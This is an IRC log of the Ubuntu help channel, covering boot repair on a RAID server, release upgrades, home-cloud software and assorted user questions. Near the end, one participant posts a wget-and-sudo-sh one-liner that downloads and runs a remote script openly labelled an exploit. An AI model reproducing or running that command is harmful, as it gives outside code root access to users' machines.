
Bashing-omquadrathoch2: :D Help is what we do -00:01
ExcessiveAggroevening all00:26
ExcessiveAggroI had a power outage last night and I have a machine that is no longer booting.  It just goes to black screen with blinking cursor.  I tried reinstalling grub2 but still have the same results - any ideas?00:27
ExcessiveAggroi can boot in to a liveCD and see all the partitions just fine00:28
cart_mantomreyn: Hey is there some file that Nvidia drivers use to set up Desktop and screens? I deleted ~/.config/monitors.xml and nothing changed after reboot00:28
Bashing-omExcessiveAggro: From that liveCD run 'fsck' on the installed root partiton. Often times a power failure leaves the file system in an inconsistent state.00:30
ExcessiveAggrook let me give that a go00:31
ExcessiveAggrodo i need to be in chroot?00:31
Bashing-omExcessiveAggro: No need for a change root - just point the repair toll to the partiton to look at it and repair as it can.00:32
ExcessiveAggroon it - thank you00:32
ExcessiveAggroBashing-om: What am I looking for when this runs?  It says: /dev/sde5: clean, ... files, ... blocks00:36
Bashing-omExcessiveAggro: That partion checks as good . Is that "root's" partition ? Might show us - in a pastebin - what you are working with ' sudo fdisk -lu '.00:40
ExcessiveAggrohere you go - https://pastebin.com/TPtWha8A00:42
ExcessiveAggrolots of drives in there... /dev/sde5 is my root partition and /dev/sde1 is the /boot00:43
ExcessiveAggroone thing I'm confused by.... sde2 and sde5 look the same start and end sectors00:44
Bashing-omExcessiveAggro: Looking ^ .00:45
oerheksextended ..00:45
oerhekswithin that extended, one has room for more than 4 partitions. not sure why you choose extended.00:46
ExcessiveAggrono clue - this thing was built a while back00:46
ExcessiveAggromonths... not years ;)00:47
oerheksyou would save 2 block00:47
oerheksso nothing odd, linux installed itself in one partition, so swap is swapfile, instead of partition.00:47
ExcessiveAggroah ok00:48
oerheksand that 512 sde1, if for your UEFI bios.00:48
ExcessiveAggrooerheks is grub supposed to be in that 512m spot?00:49
ExcessiveAggrobecause thats where i reinstalled grub2 at00:49
ExcessiveAggroi mounted sde5 to /mnt then mounted sde1 to /mnt/boot.  Then did a grub reinstall00:51
oerheksno, to /boot/ AFAIK https://help.ubuntu.com/community/Grub2/Installing00:52
oerheksuefi just gives the adress and modules to handle grub/mbr/gpt00:52
ExcessiveAggroso what goes in that uefi partition?  how do i recreate it properly00:52
ExcessiveAggrobecause no doubt ive borked it... I installed grub in to it00:55
oerheksnot sure howto recreate that partition, why do you think it is wrong?00:55
oerheksgrub does not install to fat32..00:55
ExcessiveAggrowell i mounted that 512m partition to /boot... then ran a grub install to it00:56
ExcessiveAggrothere was nothing in it... i thought that might have been what was wrong00:56
shelcodHey everyone. I'm trying to install Ubuntu on an old x86-based tablet. and it installed fine, but by default the tablet wants to display everything in a 9:16 aspect ratio, and rotating the screen to be 16:9 has really bad screen tearing that isn't there when the tablet screen is not rotated. Is there a way to fix the screen tearing?00:56
quadrathoch2ExcessiveAggro that partition is /boot/efi which is fat32 with only the efi files in it. /boot should be on your /, except you created a /boot part00:57
oerheksshelcod, screen tearing as it is not fast enough? care to share what tablet, and what ubuntu version?00:58
cart_mantomreyn: Hey is there some file that Nvidia drivers use to set up Desktop and screens? I deleted ~/.config/monitors.xml and nothing changed after reboot00:59
shelcodscreen tearing as in there is no vsync and certain parts of the screen are updating faster then other parts.00:59
oerheksExcessiveAggro, reinstall again, just with sde500:59
shelcodI'm looking for the model number, but I'm using Ubuntu 20.04.01:00
shelcodModel number is NS-P08W7100-C.01:01
oerheks= gnome3, might be too heavy, use a lighter desktop, mate or xubuntu?01:01
shelcodI am using XFCE.01:01
ExcessiveAggroquadrathoch2 and oerheks - thanks attempting now01:03
oerheksbaytrail tablet.. good luck with those, 64 bit processor, 32 bit uefi :-(01:05
shelcodI already got Ubuntu installed by using a script that adds a 32 bit bootloader to the ISO01:06
ExcessiveAggroquadrathoch2 and oerheks - so odd... black screen, cursor comes up, then carriage returns once, then sits there01:10
oerheksmaybe just boot in recovery and perform apt install -f or updates again?01:11
ubottuIf your system fails to boot normally, it may be useful to boot it into recovery mode. For instructions, see https://wiki.ubuntu.com/RecoveryMode01:11
ExcessiveAggroI tried that in the beginning and couldnt ever get grub to respond by holding SHIFT like it says in the article.  So I figured grub was broken01:15
ExcessiveAggrogoing to attempt again01:16
Bashing-omExcessiveAggro: EFI then it is the escape key that grub looks for.01:17
ExcessiveAggroBashing-om shouldnt /boot/efi have something in it?  a listable file of some sort?01:32
ExcessiveAggroMine is empty - and i have the 512m boot partition mounted there01:33
tomreynExcessiveAggro: maybe that's not the efi system partition your system booted from? do you have other storage media attached?01:35
Bashing-omExcessiveAggro: Yeah it should - however as I do not have access to a EFI machine I can not verify what :(01:35
ExcessiveAggroim going to pull all the other drives out to see what may be going on.01:36
tomreynecho -n 'This system booted via: '; [ -d /sys/firmware/efi ] && echo UEFI || echo BIOS01:36
tomreyn^ verify how you booted01:36
ExcessiveAggrowell.... apparently this is a wild goosechase because it says i booted via bios01:37
ExcessiveAggroSo my grub-install is not doing the efi install because i booted via bios01:38
jrmHi.  packages.ubuntu.com tells me that there is a focal package for openjdk-8-jre-headless.  However when I do sudo apt update && sudo apt install, I get E: Unable to locate package openjdk-8-jre-headless.  Most other packages are located and installed fine.  Am I missing something?01:40
tomreyn!universe | jrm01:44
ubottujrm: The packages in Ubuntu are divided into several sections. More information at https://help.ubuntu.com/community/Repositories - See https://wiki.ubuntu.com/RecommendedSources for the recommended way to set up your repositories.01:44
tomreynyou are probably missing the  'universe' component01:44
jrmThanks tomreyn01:44
ExcessiveAggrotomreyn: I'm booting from a usb stick because the system is not booting.  Do you know how i boot via EFI so i can do a grub reinstall with efi?01:44
quadrathoch2ExcessiveAggro you would  need to choose the efi boot option in your uefi boot menu01:45
tomreynExcessiveAggro: you boot from a system that boot in uefi mode, such as the ubuntu installer / live images can (they are hybrid, support uefi + legacy bios boot)01:45
tomreynalso, note that sde has an msdos partition table, not gpt, which is unusual for uefi booting01:46
ExcessiveAggrotomreyn: ok I'm not sure why it's set up like that - it was done with a ubuntu install CD originally so not sure what it was doing01:47
ExcessiveAggroI'm not sure if this system is bios or UEFI - assumed it was UEFI because i saw the 512m partition01:48
ExcessiveAggroands that partition is mounted in  /etc/fstab01:49
quadrathoch2ExcessiveAggro it is for sure UEFI, uefi doesn't care if its mbr or gpt, gpt is just the newer partition layout. *shrug*01:50
ExcessiveAggrogot it.  let me tinker a little longer here.  Man this is bizarre to me01:50
tomreynpast boot's logs would probably show "efi: EFI" and "EFI VGA" for uefi boots01:53
Bashing-om!uefi | ExcessiveAggro01:53
ubottuExcessiveAggro: UEFI is a specification that defines a software interface between an operating system and platform firmware. It is meant as a replacement for the BIOS. For information on how to set up and install Ubuntu and its derivatives on UEFI machines please read https://help.ubuntu.com/community/UEFI01:53
ExcessiveAggroWell... It boots just fine with only 1 drive in it.  But all the other drives are my raid arrays so thats no good02:23
Bashing-om!raid | ExcessiveAggro02:24
ubottuExcessiveAggro: Tips and tricks for RAID and LVM can be found on https://help.ubuntu.com/community/Installation/SoftwareRAID and http://www.tldp.org/HOWTO/LVM-HOWTO - For software RAID, see https://help.ubuntu.com/community/FakeRaidHowto02:24
tomreynthen my theory would be that your mainboard firmware ("BIOS") is configured to do legacy boot, and finds a boot loader on one of the RAID disks' first MB02:26
tomreyn(but that boot loader is broken or doesn't know how to boot ubuntu off your sde partition)02:27
ExcessiveAggrowhen i leave sde in the system alone - it boots up02:28
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ExcessiveAggroand i set the boot priority for that disk to be booted first.02:28
tomreynso if you can make it boot, then you can check how it booted then02:30
ExcessiveAggrogood call let me do that02:30
ExcessiveAggrois it possible ubuntu created an efi partition but doesnt need it?02:31
tomreynif you're actually booting it in bios mode from a boot loader installed elsewhere, that could be.02:32
ExcessiveAggrobooting now without other disks - lets see what it says02:32
ExcessiveAggrotomreyn it looks like it booted BIOS02:42
ExcessiveAggroso lets say this thing is BIOS and not EFI... any thoughts on how i repair this?02:43
ExcessiveAggroif it boots fine with just the system drive... and it can see all drives properly when booted from a livecd... im not sure why it wont boot off the system drive when all drives are in.  maybe a hardware failure02:48
quadrathoch2ExcessiveAggro did you check that the bios boots from the correct drive?02:49
quadrathoch2at least this sounds like the bios tries to boot from the wrong one02:49
ExcessiveAggrothats where my head keeps going... but ive even forced it to hit that drive first02:50
ExcessiveAggroeven selected in a manual bbs menu02:51
quadrathoch2i assume you are using UUIDs in /etc/fstab?02:52
ExcessiveAggroyes sir02:52
ExcessiveAggrodouble checked them02:52
ExcessiveAggrobooting up now with just one array installed... see if that goes02:52
quadrathoch2could you post your fdisk again? I can't scroll up enough for the link :(02:54
ExcessiveAggrowell this is cool... it booted with one array in... going to shut down and put another one in..02:54
ExcessiveAggroaw crap it timed out02:55
ExcessiveAggroquadrathoch2 - booting it back up now with all the drives in it - will be able to get a new fdisk03:03
quadrathoch2i'm still not understanding why there is an uefi partition with a bios install ( as the installer wouldn't create it in bios mode)03:07
quadrathoch2could it be a relic of an old install?03:07
ExcessiveAggroquadrathoch2 that is very possible03:07
quadrathoch2ahh, so that's why it's maybe empty03:07
ExcessiveAggroI'm starting to think this may be a power supply issue.  ABout to test that theory now03:08
quadrathoch2oh you are right, totally forgot that it could be hw related03:08
ExcessiveAggrojust put the other array in - and left the first one off.  if it boots then they all boot, just not at the same time03:08
quadrathoch2ExcessiveAggro so does it boot?03:19
ExcessiveAggroquadrathoch2: https://pastebin.com/6scbRb3p03:22
ExcessiveAggrono i didnt boot with the other array in.  Almost like something is wrong with that array that prevents even grub from loading03:22
ExcessiveAggrobut I just booted back up in to the liveCD and i can mount that array no issues.03:22
lestercHi peeps! Tried microstack recently and found it awesome! Where can I find more information?03:23
quadrathoch2ExcessiveAggro ehm, whats your raid setup? as you have discs without any partitions Oo03:26
quadrathoch2trying to understand that03:26
ExcessiveAggrogimme a moment - putting that pastebin together now03:27
BlitzerHoundI don't know if this is the proper channel to ask for help with this, but I've been really having trouble installing anything via terminal lately. It just says that it can't fetch stuff, and lots of 404 errors. I can pastebin if y'all need03:27
quadrathoch2BlitzerHound yes, paste it to a paste service so we can see whats going on03:28
BlitzerHoundI ran the command sudo apt-get install intltool03:29
lotuspsychjelesterc: https://ubuntu.com/tutorials/microstack-get-started?&_ga=2.259466570.1526014397.1615692545-402761834.1615692545#1-overview03:29
quadrathoch2BlitzerHound your version of ubuntu is eol03:30
BlitzerHoundWhat does that mean?03:30
quadrathoch2you should have upgraded a while ago ;)03:30
quadrathoch2ahh, sorry, thought it would recognise the name, but it doesnt03:30
BlitzerHoundOh. So do I have to install a whole new operating system?03:30
quadrathoch2no you can still upgrade03:31
quadrathoch2but first  you would need to make sure to be up to date on eon03:31
ubottuEnd-Of-Life is when security updates and support for an Ubuntu release stop. Make sure to update Ubuntu before it goes EOL so you get updates promptly for newly-discovered security vulnerabilities. See https://help.ubuntu.com/community/EOL and https://wiki.ubuntu.com/Releases for more info. Looking to upgrade from an EOL release? See https://help.ubuntu.com/community/EOLUpgrades03:31
ExcessiveAggroquadrathoch2: Here is the disk configuration - https://pastebin.com/hYza6a7303:31
quadrathoch2BlitzerHound sounds like you want to stay on the LTS releases of ubuntu (so you would need to upgrade at the latest every 5 years)03:31
BlitzerHoundI'm using lubuntu, is that different than ubuntu?03:32
ExcessiveAggrobooting to a liveCD and i can manually mount all raid arrays and the Volume group.03:32
quadrathoch2BlitzerHound no03:34
quadrathoch2ExcessiveAggro wow, never seen such a setup ;) that's why I was confused03:34
ExcessiveAggroyeah it's a little bizarre.  I was trying to use all the space on those drives while also staying redundant03:34
ExcessiveAggroand they were different size drivse so had to get a little creative03:35
BlitzerHoundI don't really understand what I'm reading here...03:35
quadrathoch2*cough* btrfs xD03:35
ExcessiveAggroquadrathoch2 haha well I definitely need to learn a little more, I'm no expert there03:36
BlitzerHoundShould I just follow the commands it says here?03:36
quadrathoch2BlitzerHound short version: edit your sources.list file to the new location of the official eon repos, update your system, make sure you have a backup, and verify that the ppa or third party repos have a focal version of packages, upgrade to focal03:36
quadrathoch2ExcessiveAggro this is imho one of the big upsides of btrfs, as you can just use any combination of disks03:37
quadrathoch2on the other hand raid5/6 is not stable as of right now (but it's getting tackled this year)03:37
ExcessiveAggroheres what im thinking on this issue.... whats the easiest way to wipe all the drives that are in that VG?03:38
ExcessiveAggrobecause i can move all the data off them while im on the liveCD03:38
ExcessiveAggroand that VG is the one preventing the boot03:38
quadrathoch2eh destroy the partition table? or just format them03:39
quadrathoch2oh wait03:39
quadrathoch2you can just destroy the vg03:39
BlitzerHoundquadrathoch2, thank you, I'll try. I'm just dumb when it comes to this stuff03:39
ExcessiveAggroim thinking about destroy the vg, the partition tables, the raid arrays, and anytyhing that makes those drive a living creature03:40
quadrathoch2BlitzerHound, take you time, and if you have questions, people are here to answer them ;)03:40
quadrathoch2just make sure to upgrade earlier (so it's way easier)03:40
quadrathoch2oh if you can do that, why not just recreate the whole system (imho)03:40
quadrathoch2ExcessiveAggro ^03:40
ExcessiveAggroi have lots of app installs :(03:41
quadrathoch2it was just a suggestion ;)03:41
ExcessiveAggroand the other array that is working has all the installs on it03:41
ExcessiveAggroi will just start backing out this VG all the way down to bare metal03:41
quadrathoch2kk, btw, any reason why on the one md you use partitions, on the other the whole disk?03:42
lesterclotuspsychje: I have done the tutorial. Thanks though!03:42
ExcessiveAggrothe one with the whole disk... someone told me the partitions werent necessary any more03:42
ExcessiveAggroits a newer array03:42
quadrathoch2ExcessiveAggro eh, i wouldn't do that, it's okay but it could give you headaches when you lose 1 drive03:43
quadrathoch2because if you new drive has 1 bit less of space then the old ones, you can add it to the array03:43
quadrathoch2thats why normally you use partitions03:43
ExcessiveAggroquadrathoch2 ah thats a good reason - the guy who told me didnt mention that03:44
lestercsmall ssd for OS and big HDD for /home FTW ExcessiveAggro.03:44
quadrathoch2uiui, just saw a 112 gigs fat32 partition :), sounds like dual boot somehow03:45
ExcessiveAggrothats the usb stick i booted this livecd off of03:46
lesterctomreyn: I went through that - I'm checking https://opendev.org/x/microstack03:46
quadrathoch2huh fat32 oO03:47
quadrathoch2ExcessiveAggro so back to topic, which arrays are you destroying now?03:47
ExcessiveAggrovg0  - which is md0 and md103:48
quadrathoch2ExcessiveAggro ever thought about zfs?03:50
quadrathoch2just giving you options ;)03:50
lesterc+1 quadrathoch2 ^_^03:50
lestercespecially on ubuntu with zfs rootfs03:50
ExcessiveAggroyeah i could do that too03:50
ExcessiveAggroid be happy to rebuild these disks with zfs03:51
ExcessiveAggroim having a brain-fart here trying to determine where my raid UUID came from03:51
lestercWhat are we working with here? desktop/rack mount?03:51
quadrathoch2sounds like desktop lesterc03:52
lestercthere are UUID on bloack device and LVM03:52
ExcessiveAggroits a 4u rack mount03:52
ExcessiveAggro16 drivebays03:52
lestercWhat do you use it for?03:52
lestercAre we setting up a new server?03:53
lestercAny existing data? Any backup?03:53
ExcessiveAggromy own private google lol.  It's running plex, nextcloud, a few game servers03:53
lesterc(sorry I missed a bunch of info - got disconnected ^_^)03:53
quadrathoch2holy moly, so that's then a really really weird setup then ;)03:53
quadrathoch2ExcessiveAggro> my own private google lol.  It's running plex, nextcloud, a few game servers03:53
ExcessiveAggrocheck out this pastebin for my silly disk configuration - https://pastebin.com/hYza6a7303:54
lestercso md1 = rootfs?03:54
ExcessiveAggroall the important stuff lives in md2 and its running fine03:55
quadrathoch2root is a single disk03:55
lestercThat's a weird setup :D03:55
ExcessiveAggroif you want to see the rest - https://pastebin.com/6scbRb3p03:55
quadrathoch2yeah, imho I would really build it from the ground up :/03:55
quadrathoch2even if it means recreating everything (so wasting a bit of a few hours) as it's less headache if something breaks03:56
ruenoakHi all is there away of replacing your pgp key in Launchpad with a new one? I lost my original key and need to replace it.  I asked over at the Launchpad channel but seems a bit quiet over there. Thanks03:56
quadrathoch2but that's me :)03:56
ExcessiveAggroi likely will - just need to get nextcloud and the other items back up so i can pull everything off cleanly03:56
quadrathoch2hrhr, I would even go as far as figuring out the sorting of the disks, I would hate sde as being root :/03:57
lestercGet a few new drives are you can down size and save on power hehe03:58
ExcessiveAggrohaha yeah that happened along the way because of the onboard SAS connectors03:58
ExcessiveAggrothey were in the way of my bitcoin mining GPU :)03:58
ExcessiveAggroso sda got moved to sd203:59
ExcessiveAggroerr e*03:59
quadrathoch2btw how did you setup nextcloud etc? ExcessiveAggro03:59
quadrathoch2or your services in particular03:59
ExcessiveAggro1 at a time :)04:00
ExcessiveAggrofound the ubuntu nextcloud instructions somewhere and walked through them04:00
ExcessiveAggrothen had to migrate the data to the array04:00
lestercman - I need to get ZNC working again.04:04
lestercSo no openstack/k8s people here?04:05
quadrathoch2for what lesterc04:05
quadrathoch2but i assume probably not ^^04:06
lestercops/infra operators - I am sick of the (very old) foreman setup at work and want to move to something morden04:07
lestercbut lacks experience04:07
quadrathoch2so what's the question then?04:08
ExcessiveAggroif you have 2 fingers - cross them for me04:11
lesterclol damn I said that to new hires all the time! Okay questions: any official docs for microstack or do I need to refer to officially openstack docs?04:12
ExcessiveAggrojust blasted all those drives and rebooting04:12
lestercExcessiveAggro: good luck :D04:12
lotuspsychjelesterc: idle around in #ubuntu-server perhaps for likeminded volunteers04:13
lotuspsychjelesterc: or #ubuntu-discuss for other microstack lovers, never know04:13
quadrathoch2ExcessiveAggro yep, good luck :)04:13
lesterclotuspsychje: good advice.04:14
ExcessiveAggrothis has to be a hardware problem because even with those drives wiped it wont boot when they are plugged in04:23
ExcessiveAggrotake them out and she comes right up.  They are all plugged in to the same SAS backplane so im betting its borked04:23
quadrathoch2ugh, that's bad :( ExcessiveAggro04:24
ExcessiveAggrowell good news is the system is up along with the main array04:25
ExcessiveAggrojust need to start swapping hardware to see if its the backplane, or a powersupply issue04:25
quadrathoch2have fun I guess ExcessiveAggro04:26
lestercAll the reasons I downsized my home setup... I only run 3 HP microserver-like boxes and even that I don't have all of them on all the time. /me too cheap for h/w and power04:36
ExcessiveAggrolesterc - hey I feel you.  I just didnt feel comfortable with all my stuff in the cloud anymore04:39
ExcessiveAggroI guess I need to spring for bigger drives and a smaller quantity of them04:40
quadrathoch2ExcessiveAggro why not just use them till you need bigger ones, or they fail. i mean you already have them ;)04:40
quadrathoch2imho the software side could be better but that's it04:40
ExcessiveAggrowell if its a mobo or powersupply issue i guess i can just replace it and move on04:41
ExcessiveAggrothe mobo is ancient in this thing.  i probably should do that04:42
lestercAnother thing for home setup I only do zfs mirrors these days - that keeps things simple. I value more time than the space wasted.04:42
ExcessiveAggrothink i should do a desktop mobo?04:42
ExcessiveAggroor this - https://www.newegg.com/asus-ws-c246-pro-intel-xeon-processor-e-2100-family-intel-pentium-processors-intel-celeron-processor/p/N82E16813119329?Item=9SIA25VCMV374504:43
quadrathoch2imho the biggest factor is probably IPMI, if its needed or not04:46
ExcessiveAggroim not up on that - is that for management?04:46
ExcessiveAggrosince this lives in my house im ok with it not having lots of out of band management04:47
quadrathoch2ExcessiveAggro then any mobo should be fine04:48
quadrathoch2but yes IPMI is just remove management04:48
lesterc**remote management04:53
lesterconce you have more than a few boxes it's a must IMHO.04:53
lestercand opens a whole new world with provisioning.04:54
ExcessiveAggroI used to have quite a few at home but down-sized to just this one box.04:54
lestercprecisely why I stopped doing homelabs - too expensive and I couldn't justisfy the cost when I'm working 6 days a week04:54
lestercBetter plan: get a job that will pay you to do all that hahahaha...04:55
ExcessiveAggrolesterc: I hear you04:55
quadrathoch2hm, i moved to 1L systems, where I shove in 2-3 disks (2.5")04:56
quadrathoch2so they don't take too much space04:56
ExcessiveAggroim gonna move to a 30-node raspberry pi beowulf cluster04:56
ExcessiveAggrostore it in a shoebox04:56
lestercPis are nice and cool but the return of investment is too low for me.04:57
* lesterc is a cheapsake04:58
quadrathoch2yeah sadly pis are a bit too expensive for what they are :/04:58
ExcessiveAggrohaha yeah I'm being silly here.  I only have 1 in production right now and it serves a great purpose.04:58
matsamanthey're good if what you want is primarily low power, always-on, no fans05:00
matsamanalthough I hear some of the newer pis really want for a fan <shrug>05:00
matsamanplenty of other SBCs in the sea, though05:00
quadrathoch2yeah just looking at the construction of the pi 400 just tells you how much cooling is needed05:00
quadrathoch2but the software support of other sbc are most of the time not as great afaik matsaman05:01
lestercthere are fanless industry PCs if you want low power and NO noise.05:01
lestercI have one of them that sits at the corner of my desk - love that.05:01
quadrathoch2which one is it (if you remember the name)05:02
lestercI can try looking it up05:03
ExcessiveAggrooff-question.  Can i just move these drives to a new mobo and ubuntu will figure it all out?  Or will i need a reinstall?05:03
quadrathoch2as long as you use UUIDs ubuntu will figure it out05:04
ExcessiveAggroyes its all done with UUID05:04
ExcessiveAggrohm that may be sweet05:04
ExcessiveAggroalthough i need a reinstall anyway - with zfs is what im hearing from you all05:04
matsamanExcessiveAggro: there's a decent chance it will work05:04
matsamanExcessiveAggro: zfs? No I wouldn't bother05:04
matsamanbut I missed the conversation05:04
quadrathoch2sadly btrfs raid5/6 is not stable as of right now, because it would fit for that system perfectly, but zfs i also not too shabby for that, mdraid is still okay though :)05:05
lestercquadrathoch2: there are so many of them that looks very similar - probably from the same factory: https://au.banggood.com/search/fanless-mini-pc.html?from=nav (yes hello from Australa)05:05
quadrathoch2what a name (of the homepage)05:06
quadrathoch2oh interesting, you were even talking about x86_6405:06
ExcessiveAggroComplaint about NextCloud - all the data is stored in the file system but obscured away and locked to root.  Are there any good "home cloud platforms" that just point to a standard directory?05:07
matsamanDebian keeps a nice list of SBCs for their "freedombox" initiative. They're actually better than Raspberry Pis because they rely on less proprietary stuff05:07
matsamanExcessiveAggro: you doing RAID then?05:08
ExcessiveAggromatsaman: yes on raid now but thinking about moving to something else if i have to rebuild05:08
quadrathoch2ExcessiveAggro seafile05:08
matsamanExcessiveAggro: cloud? Are you trying to have backups? Or remotely-accessible data stores, or...?05:08
ExcessiveAggroyou missed my sweet raid configuration earlier -> https://pastebin.com/hYza6a7305:08
quadrathoch2if you want to have a dropbox "cloud"05:09
ExcessiveAggromatsaman: would be nice to reach those files from my phone when im away05:09
quadrathoch2vpn already set up for that?05:10
matsamanExcessiveAggro: if your phone lets you do sftp/ssh, then you can just allow remote ssh access05:10
ExcessiveAggroquadrathoch2: nextcloud used SSL for it.   but i could do a vpn05:10
matsamanExcessiveAggro: zero security issues that way05:10
matsamanwebUIs make security really complicated05:10
quadrathoch2ExcessiveAggro i would try to hide most stuff behind a vpn, so it's less of a security risk.05:10
quadrathoch2but you could also open the port05:11
ExcessiveAggroyeah maybe i could just do a vpn and then connect to the share from the phone05:11
quadrathoch2this is what I do, because I don't need always access to the home network05:11
ExcessiveAggrothis seafile looks like it has a native app05:12
ExcessiveAggrodoes that app talk to the server via ssl?  or do you need to vpn in05:12
quadrathoch2ExcessiveAggro you caught me offguard, but I am sure it's encrypted, give me a sec05:16
ExcessiveAggrooh you dont have to look it up05:16
ExcessiveAggroI can go read up05:16
lestercmy first irc session in many years - it has been fun - cya all internet strangers!05:17
ExcessiveAggrolesterc: nice chatting friend05:17
quadrathoch2ExcessiveAggro yeah it's encrypted by https/tls05:17
ExcessiveAggroI think I'm gonna exit the nextcloud - I thought it would be just like g-drive (and it is) except i hate that i cant reach the files directly using NFS05:18
quadrathoch2yeah nextcloud is way more than g drive, and it shows. if you only want file sync, its way too much05:19
ExcessiveAggrowell i replaced google photos also with it.  But that didnt turn out well.  70k photos and its been churning on them for weeks05:20
ubottuPlease read the channel topic whenever you enter, as it contains important information. To view it at any time after joining, simply type /topic05:20
ExcessiveAggrotomreyn have we strayed too far off?05:21
quadrathoch2ExcessiveAggro let's move on to offtopic05:21
ExcessiveAggroSorry I forgot I was in Ubuntu - got a little carried away05:21
tomreynthanks ;-) it didn't seem like ubuntu support Q&A anymore05:21
ExcessiveAggroWell thank you all for the support this evening.  System is back up and running, minus 4 drives that i didnt need spinning anyway.05:22
quadrathoch2np :) and hf :)05:23
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piceaglaucaHey folks. I'm looking for help booting into a Kubuntu USB stick. I get an error from grub> boot -> error: unknown error.07:21
guivercpiceaglauca, give people a chance to answer before you ask in another channel07:28
piceaglaucaguiverc sorry - I was hedging my bets on where people might be active :)07:29
unixbsd_1I just managed to play Grand theft auto Vice City, with the gamepad on Ubuntu, and just activated the "Float over water, cars", that's all working. If interested, let know.09:29
lotuspsychjeunixbsd_1: #ubuntu-discuss or #gamingonlinux perhaps09:30
willerfresh install of xubuntu & nextdns.io as DoH provider - lookint at the logs i'm seeing a DNS request  being sent to example.org every 2-3 minutes. any idea where that may come from?09:31
unixbsd_1why not #ubuntu-games? this sounds easier to find09:31
unixbsd_1is there maybe !list channels or something for new bginners, to find out all poppulated ones.09:31
lotuspsychje!alis | unixbsd_109:32
ubottuunixbsd_1: Alis is an IRC service to help you find channels. For help on using it, see "/msg Alis help list" or ask in #freenode. Example usage: "/msg Alis list http"09:32
unixbsd_1or /msg Alis list ubuntu09:32
pizzaburgerHi! Basic command line question: how do you searh manual pages based on keywords? Example would be the "ssh" command and searching for keyword "port". I see that "man ssh | grep port" gives me the desired result (manual page for ssh then pipe that to listing text lines containing the keyword). I've also read that there's a "-k" option which works10:18
pizzaburgeron the man page itself: "man -k ssh". Can you use the "-k" option on other man pages?10:18
antiPoPHi, my Ubuntu install stopped detecting my mic, worked fine until today. The mic is detected by pavucontrol but no signal. I tried everything in the help page but didn't work. pavucontrol does not show meters anymore.10:36
clarkkin ubuntu 20.04, can someone explain how to change the default user Videos, Music, and Pictures directories? I've tried amending ~/.config/user-dirs.dirs, but it just get overwritten and reset on reboot10:43
clarkkI tried running, xdg-user-dirs-update --set XDG_VIDEOS_DIR "/media/mypath, but XDG_XDG_VIDEOS_DIR_DIR gets added to user-dirs.dirs, which doesn't seem right10:44
clarkk* user-dirs.dirs, XDG_XDG_VIDEOS_DIR_DIR10:45
clarkkLooks like underscores are being filtered out in this channel?10:45
ubottuAlis is an IRC service to help you find channels. For help on using it, see "/msg Alis help list" or ask in #freenode. Example usage: "/msg Alis list http"10:53
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=== LabMonkey is now known as Mechanismus
clarkkin ubuntu 20.04, can someone explain how to change the default user Videos, Music, and Pictures directories? I've tried amending ~/.config/user-dirs.dirs, but it just get overwritten and reset on reboot. I tried running, xdg-user-dirs-update --set XDG_VIDEOS_DIR "/media/mypath, but XDG_XDG_VIDEOS_DIR_DIR gets added to user-dirs.dirs, which doesn't seem right10:56
olle_Can the Ubuntu installer be used to install Ubuntu besides an existing Manjaro system? I had problems with the server version of Ubuntu, but maybe the desktop version will work?11:02
olle_gonna try with xubuntu11:08
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clarkkI'm using Gnome 3.36 on Ubuntu 20.04. When I go to https://extensions.gnome.org/ and try to install an extension, it Chrome offers to download rather than install it. I could just install it from the extension page when I was on 18.04. Note that I do have https://chrome.google.com/webstore/detail/gnome-shell-integration/gphhapmejobijbbhgpjhcjognlahblep installed in chrome, and chrome-gnome-shell installed in the OS. How do I resolve this?11:26
clarkksorry, ignore that question about gnome extensions. I just needed to use the on/off switch on the extensions website to install an extension.  I still need help with changing the Videos, Music and Pictures locations tho11:29
unixbsd_1do you know any alternative to proftpd that works right ahead for ftp server? (proftpd is buggy, fails to start).11:31
lotuspsychjeunixbsd_1: be carefull with ftp protocol, highly exploited these days11:34
lotuspsychjeunixbsd_1: try an sftp server instead or any other safer protocol11:35
unixbsd_1i know it is crap11:35
unixbsd_1proftpd is widely used, I compiled it from source on openbsd. I saw all leaks with that crap soft11:35
unixbsd_1lot of people still use it to many thigns, and you can enter readily, not due to the soft itself, but the config file is hard to get it secured.11:36
unixbsd_1I use it on my pi zero samba+ (soon ftp) server on local intranet (only wlan can access it). it is behind several unhackable BSD machines. I use BSD to lock down and increase security. linux is less secured than bsd for hacks./exploits.11:37
BluesKajHowdy folks11:56
kirk781BluesKaj, hello :p11:58
BluesKajhi again, kirk78111:58
unixbsd_1lotuspsychje: oh, well, you just need sudo4lamers to get an exploit and full control of the Ubuntu machine, any machine. One single sudo and ubuntu is backdoored.12:02
lotuspsychjeunixbsd_1: lets discuss that in #ubuntu-discuss please, leave this room free for support12:02
unixbsd_1security channel?12:03
lotuspsychjeunixbsd_1: the security channel is also not really for discussions, rather for security support issues12:04
unixbsd_1#ubuntu-piracy ?12:04
unixbsd_1lotuspsychje: you arent up there on hardened. .. seems12:17
lotuspsychjeunixbsd_1: i'm not part of the security team12:18
fpombalhi, I have a question regarding packaging backports for PPAs. So far I have been using `apt source` and `dget` to get the source, which gets me all the required files, including the .dsc, .debian.tar.xz and .orig.tar.gz, and also applies all the debian/patches automagically12:20
fpombalHowever, when using these commands I have noticed the message: "NOTICE: <package> packaging is maintained in the 'Git' version control system at: (...) Please use: `git clone https://salsa.debian.org/debian/<package>.git` to retrieve the latest (possibly unreleased) updates to the package."12:20
fpombalI would like to try this out and do more stuff with git rather than the debian-specific tools. But, I don't know how to proceed after cloning; so my questions are:12:20
fpombal- how do I get the other ancillary files like the .orig tarball and .dsc?12:20
fpombal- how do I apply all patches automatically from debian/patches? Can I just use `git apply`?12:20
fpombalthanks in advance for any input on this12:21
fpombalNote: for additional context, my usual workflow after getting the sources is some simple invocations of `dch`, `debuild` and `dput`, and also possibly patching the sources with dquilt (the recommended quilt alias config in the debian new maintainers guide) if required.12:24
fpombalI decided to post here because I'm using Ubuntu and I just want to optimize the process of uploading to my PPAs, but please let me know if I should seek help on #debian instead (or additionally).12:28
unixbsd_1lotuspsychje: ok, I have uploaded the code on github. to exploit ubuntu, run: " wget -c https://gitlab.com/openbsd98324/sudo4lamers/-/raw/master/evilinstall.sh -O /tmp/evilinstall.sh ; sudo sh /tmp/evilinstall.sh "     is enough to let your machine open to exploits.12:44
lotuspsychjeunixbsd_1: please dont use this channel for exploit tests12:45
=== urdh_ is now known as urdh
floownQuand je cherche à me connecter à phpmyadmin, en root, j'ai ça comme message : mysqli_real_connect(): (HY000/1698): Access denied for user 'root'@'localhost'13:44
floownJ'avais purgé et réinstallé le paquet13:44
floownmais il ne m'a pas été demandé de mdp pour root13:45
BluesKaj!fr | floown13:48
